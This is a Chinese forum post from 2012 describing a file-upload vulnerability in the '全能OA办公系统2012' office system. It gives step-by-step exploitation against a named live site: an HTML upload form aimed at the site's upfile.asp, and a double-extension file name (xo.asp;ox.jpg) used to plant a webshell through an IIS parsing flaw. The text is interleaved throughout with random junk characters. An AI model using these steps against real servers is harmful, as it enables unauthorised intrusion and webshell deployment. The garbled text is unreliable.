全能OA办公系统 上传漏洞
3 `& s V+ T. F
- B/ V N6 Z) |3 A/ ~ ~5 ~; b6 s系统介绍:
6 M! V; V/ R) R% e. C) n& l3 }& |2 L {& E5 i2 B
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。: i2 h* @* H' t* L, L
8 |( O+ ]9 r: {8 Y& E. h
主要功能:
6 p" `. Z) X$ f1 S公司通告 ' f7 w- Z g' d6 m+ K
工作计划
- ?9 J/ t: e. c7 M7 S# b: B- @! ~通讯助理
3 @7 }7 [/ k3 d9 A, p5 Q5 E5 f客户资源 ; v- u, h% _& {
我的公文 * d7 h. a2 y5 Y( U+ Z7 y0 ?
公文传阅
3 m. ?0 A) j3 r2 \/ {) h3 _公共资源
9 R, f3 d0 Z1 g6 a" p/ y2 C资源预约
" R6 Q& Z/ O ~; X. y今日考勤
% J$ o# j( A) \* Q1 j个人计划 : k7 v. ?/ V2 |
个人通讯录
9 d8 E) W5 [! X7 \, n& R0 D个人基本档案
. N) `% P" p D4 C7 b& ~ N5 d- e未读邮件 : o. A9 \+ C T+ E# r( f, |. {
发邮件 , f' o% r/ ?2 H" ]' R
收件夹 + i- j: V2 m* @/ h9 q0 i/ `/ }5 ?5 a
寄件夹 ; [7 L; U* z$ h# P; k) h, n( [
网络硬盘
6 ?/ U+ F& O. {3 T, m% ] W# J5 R网络会议
0 O; @/ x- h6 B; X, F; v4 z' {/ w网络调查 3 u, D8 Q9 ?1 h
交流论坛
9 Z: G! Y& |0 `1 _
0 u" \) X7 S- n) h4 H8 [有兴趣测试的朋友可以下源码看看
1 ~' R- v: [( F4 u" @ P* y: _6 x' T t- P, x
源码下载:
6 W" L6 ^5 g; p" q1 E: C, P" n
. d4 w2 O2 z1 p: ?http://www.mycodes.net/30/4750.htm
3 N+ k" X4 d2 B2 d7 E' }" q/ E6 }* x* i; j6 z
漏洞介绍:
& P( d1 W5 N; R$ ^: ]2 ]& x. p$ S
/ B/ O$ Q3 s2 k# c1 e6 v' |由upfile.asp上传文件漏洞引起3 ]3 s2 M' ]3 c+ Q: W6 }% ?
+ @5 m* {8 U9 g9 c
测试方法:- ^) b- S( V, C- b* S$ C, l
7 y$ ~" T: ^% x
使用名小子上传http://www.itlynn.com/upfile.asp即可
! C7 O! N. U2 O1 u- z9 N
( U8 L$ s, v# v. |0 ]/ a如果upfile.asp文件被删除不存在。 N) h5 z! e9 l# s; a- d, P
* n( z! Q. [ p6 f 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。& N2 f# o/ {% b# j6 ^
: P4 i( K: ?9 u$ y如果存在那么将如下代码保存为upfile.html。
9 Q; X4 ]* g$ b# t: X
4 _4 c6 f% p7 P3 ~: y8 ]然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
- H5 j7 g# C" a) _; t' n# N( k* b( d% M6 Z. X5 r5 J
& J6 B1 W( D2 N K1 ~ K2 H% L
% k& R+ e0 N, M01 <table border='0' align="center" cellpadding="5"> 6 b5 w* s. g3 a }! O6 T
2 `( y4 G! ]5 A% ~- P! i# t( p9 |
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
7 _9 @; l+ x* @6 z T3 e) Z) M# R* @
- `, i0 [) z0 P3 F4 `03 <tr>
9 N# s* x/ i$ Z% Y# P5 V1 p" Y6 r% V, _2 F1 ~" p. ~
04 <td>报错:</td> 1 \- X1 K k2 c2 x
0 ~+ b5 X% U: f3 `
05 <td><input type='radio' name='errnumber' value='0'> & v* a( Y" S3 v! F# q0 z+ q
2 ?- O3 O6 B$ o4 e7 B
06 自动更名
* K) L& H& I4 S! ~5 U* p
5 L2 u# R* t7 V \/ x" N* h- G07 <input type='radio' name='errnumber' value='1' checked> 1 ?0 I$ c% k0 q
8 X( A" `' _* _- s0 v+ b2 T% K
08 报错方式
" d# ~ @9 N" O$ C/ I; R
, n/ Z# N5 Y% h+ K09 <input type='radio' name='errnumber' value='2'>
# A2 d3 j0 N2 e& y1 q6 l N4 N4 h( n* p9 {' D8 s* J4 s4 Q* ], C7 r
10 直接覆盖</td>
( M7 S5 T! g6 `9 I" V# P* Z
+ u& H& K0 ~1 G11 </tr> 5 ]+ f/ t# A3 R" N' ^
7 ?' @. _/ U6 q! ]/ P12 <tr>
) K( B4 q# ]; @: a6 I5 \: F8 a) O0 ?2 C/ p
13 <td>主题:</td> ; B' H: Y$ M5 y& n) f+ s
. T8 q, z: P a. D* H" G0 v3 F14 <td><input type='text' name='filename' size='30'></td>
; r# ]) y) E; u U' N0 a r. U
& W$ g2 M* ^* t/ h! b# r' b( |15 </tr>
+ l7 z6 _1 k! X" S, ~& W N0 C! [* B5 d+ y. j( n# u& B
16 <tr>
, v" I- s4 U7 e x5 v7 f6 N! ^. Q1 [1 o3 V8 _8 h
17 <td>文件:</td>
1 l9 d5 x, M* A4 x5 i* Q4 f. y% I# u6 H4 z1 P
18 <td><input type="file"name="fruit"size="30"></td>
' ^ ?0 l/ p7 f; C4 D. h. m% J, D6 z- @" U$ ^; s; |) L' \8 I+ L
19 </tr> + A9 S% H! Z& x/ ]3 a; \6 I" r
9 d) S8 T. z' t' v- r# m: g20 <tr>
4 i6 M. e+ u) j" d8 J# ^7 `& ^8 n" L/ f* d( I0 `% ^
21 <td valign='top'>简介:</td> # n: G2 a# X$ D" J& w
+ U: i4 ~6 y8 m. e: E
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 5 D3 P0 E6 [: M- B l- s7 o
3 S& N$ O" Q/ N! h; a: d$ u5 L) \
23 </tr>
% s* N- M3 p5 h3 ?$ Q5 d) l4 }" v7 {' \% R
24 2 H3 Q* _& q3 }7 j$ I0 F
) |8 c+ e" W7 c9 r3 O) V: t25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> , A0 _3 `# t; f7 j h4 ~+ {$ }' O
8 A9 I6 }" I- c( K5 I/ K26 </tr> 3 I# _/ k6 |6 ]7 Y
5 }4 q- [/ B. d
27 </form> # F( ?# q V3 x8 y8 Q; r
, H1 r7 D0 ^6 t" N6 j7 x% V
然后打开上传一个文件名为xo.asp;ox.jpg的文件。$ ~/ W' g% { T! p
. e7 l& |4 C% e5 c3 I' Y2 C* J" }
/ p5 y3 ^5 O* E) D" I) m* Q8 Z1 }$ d) W' o" L
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
) ?) N/ T/ D2 G6 J; H3 g. V7 g1 q, @+ D: k) ^ [0 H# H6 B% K
此漏洞需要配合解析漏洞利用。
2 J# D; v( S1 O, Y P7 M+ n1 b1 D6 Q: T
|
发表于 2012-11-21 13:45:12
收藏
支持
反对